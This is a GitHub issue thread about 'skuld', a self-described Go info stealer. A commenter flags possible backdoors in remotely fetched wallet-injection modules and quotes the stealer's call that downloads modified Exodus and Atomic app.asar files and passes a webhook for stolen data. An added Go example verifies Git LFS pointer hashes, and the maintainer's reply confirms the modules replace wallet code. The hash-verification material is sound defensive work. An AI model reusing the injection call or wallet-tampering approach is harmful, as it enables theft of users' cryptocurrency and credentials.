hackirby / skuld

Next-Gen Stealer written in Go. Stealing from Discord, Chromium-Based & Firefox-Based Browsers, Crypto Wallets and more, from every user on every disk. (PoC. For educational purposes only)
MIT License

this is backdoored #21

Closed cartergloria37 closed 1 month ago

cartergloria37 commented 1 month ago

Likely backdoored, given the way it loads those external asar modules that are 60 MB/120 MB. It is hard to have a clue what could be happening inside those modules. Be wary.

    go walletsinjection.Run(
        "https://github.com/hackirby/wallets-injection/raw/main/atomic.asar",
        "https://github.com/hackirby/wallets-injection/raw/main/exodus.asar",
        CONFIG["webhook"].(string),
    )

Those modules are fetched dynamically when you run the code.

The problem is, there are no files there. When you git clone this repo and cat the module you get:

[user@dev-tools wallets-injection]$ cat exodus.asar 
version https://git-lfs.github.com/spec/v1
oid sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6
size 132486162

The exodus.asar file you're seeing is one of these pointer files. It's a small text file that contains metadata about the actual large file, including its size, a unique identifier (oid), and the URL of the LFS server where the actual file content is stored (version https://git-lfs.github.com/spec/v1).

The problem is that this reference

sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6

can be changed at any time by force-pushing (git push -f) to the repo at https://github.com/hackirby/wallets-injection

Dates can be faked, so you will never know when it was changed; it can be changed on any given day, and the commit date can be modified. Right now it says it was last changed 7 months ago, but the truth is it could have been changed at any time.

Nice scheme though!
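
The check a consumer of those asar files would actually want is to pin the expected SHA-256 in their own code and verify the downloaded blob against it, rather than trusting whatever the LFS pointer at the upstream URL currently says. The following is an added example written for this thread; it is not code from the skuld or wallets-injection repositories. It parses the pointer text quoted above, verifies a blob against it by size and SHA-256, and builds a pointer for a blob you have inspected yourself so you can pin it. The "downloaded" blob here is a constructed stand-in string, not the real asar, so the comparison against the quoted pointer fails by design.

```go
package main

import (
	"bufio"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// LFSPointer holds the fields of a Git LFS pointer file (spec v1).
type LFSPointer struct {
	Version string
	OID     string // lowercase hex SHA-256 of the object's content
	Size    int64  // size of the object's content in bytes
}

// ParseLFSPointer parses the text of a Git LFS pointer file.
// Pointer files are "key value" lines; version, oid and size are mandatory,
// and only the sha256 oid algorithm is accepted here.
func ParseLFSPointer(text string) (LFSPointer, error) {
	var p LFSPointer
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		key, val, ok := strings.Cut(line, " ")
		if !ok {
			return p, fmt.Errorf("malformed pointer line: %q", line)
		}
		switch key {
		case "version":
			p.Version = val
		case "oid":
			algo, hash, ok := strings.Cut(val, ":")
			if !ok || algo != "sha256" || len(hash) != 64 {
				return p, fmt.Errorf("unsupported or malformed oid: %q", val)
			}
			p.OID = strings.ToLower(hash)
		case "size":
			n, err := strconv.ParseInt(val, 10, 64)
			if err != nil || n < 0 {
				return p, fmt.Errorf("bad size: %q", val)
			}
			p.Size = n
		}
	}
	if p.Version == "" || p.OID == "" {
		return p, errors.New("pointer missing version or oid")
	}
	return p, nil
}

// VerifyObject reports whether content matches both the size and the SHA-256
// recorded in the pointer. Run this on a downloaded .asar before loading it,
// with a pointer whose oid is pinned in your own code, not one fetched from a
// repository that can be force-pushed over.
func VerifyObject(p LFSPointer, content []byte) bool {
	if int64(len(content)) != p.Size {
		return false
	}
	sum := sha256.Sum256(content)
	return hex.EncodeToString(sum[:]) == p.OID
}

// PointerFor builds the pointer a blob would have; use it to pin the hash of
// a file you have unpacked and inspected yourself.
func PointerFor(content []byte) LFSPointer {
	sum := sha256.Sum256(content)
	return LFSPointer{
		Version: "https://git-lfs.github.com/spec/v1",
		OID:     hex.EncodeToString(sum[:]),
		Size:    int64(len(content)),
	}
}

// exodusPointer is the pointer text quoted in the issue above.
const exodusPointer = `version https://git-lfs.github.com/spec/v1
oid sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6
size 132486162
`

func main() {
	p, err := ParseLFSPointer(exodusPointer)
	if err != nil {
		panic(err)
	}
	// Constructed stand-in for a downloaded blob; it is not the real asar,
	// so the check against the quoted pointer must fail.
	blob := []byte("not the real exodus.asar")
	fmt.Println("matches quoted pointer:", VerifyObject(p, blob))

	// Pin a blob you inspected yourself and confirm it verifies.
	pinned := PointerFor(blob)
	fmt.Println("matches own pin:", VerifyObject(pinned, blob))

	// A single flipped byte breaks the pin.
	tampered := append([]byte{}, blob...)
	tampered[0] ^= 1
	fmt.Println("tampered matches own pin:", VerifyObject(pinned, tampered))
}
```

The size check runs before hashing so a wrong-sized download is rejected without reading a 120 MB file twice; the oid comparison is what actually binds the blob to the version you reviewed, which is why it belongs in your code and not in the upstream pointer.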

hackirby commented 1 month ago

I use Git LFS to manage modified app.asar files because they are quite large.

I find it more efficient to directly store these files for users rather than unpacking them on users' computers, modifying the code, and then repacking them. This approach helps to ensure that the program doesn't encounter issues if Exodus or Atomic update and remove code blocks skuld would replace.

Rest assured, there are no backdoors in the hosted files. You can verify this using the command line examples I've provided in wallets-injection repository.

I have no intention of including malware; however, I understand your concern. If you prefer, you can host the app.asar files yourself on your own GitHub repository to ensure they remain secure.